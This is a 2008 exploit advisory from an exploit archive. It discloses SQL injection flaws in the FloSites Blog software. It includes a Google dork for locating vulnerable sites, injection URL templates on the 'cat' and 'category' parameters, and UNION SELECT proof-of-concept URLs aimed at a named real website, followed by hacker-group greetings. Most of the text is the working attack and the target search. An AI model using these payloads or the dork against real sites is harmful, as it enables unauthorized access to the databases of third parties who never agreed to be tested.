[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FloSites Blog Multiple Remote SQL Injection Vulnerabilities
# Published : 2008-11-16
# Author : Vrs-hCk
# Previous Title : yahoo answers (id) Remote SQL Injection Vulnerability
# Next Title : phpstore Wholesale (track.php?id) SQL Injection Vulnerability
===========================================================================================
[-] Title : Multiple SQL Injection Vulnerability
[-] Software : Flosites Blog
[-] Vendor : www.flosites.com
[-] Date : 17 November 2008 (Indonesia)
[-] Author : Vrs-hCk
[-] Contact : d00r[at]telkom.net
[-] Blog : http://c0li.blogspot.com/
===========================================================================================
[+] Google Dork
"blog by flosites"
[+] Exploit
http://[site]/[path]/index.php?cat=-1 [SQL]/*
http://[site]/[path]/index.php?category=-1 [SQL]/*
[+] Proof of Concept
http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*
http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*
===========================================================================================
[-] Greetz :
www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet
Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n,
Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ...
===========================================================================================
# www.Syue.com [2008-11-16]